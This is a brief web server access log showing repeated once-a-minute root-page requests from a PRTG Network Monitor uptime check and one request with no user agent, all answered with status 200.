212.91.246.72 - - [05/May/2024:12:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [05/May/2024:12:40:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:12:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:43:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
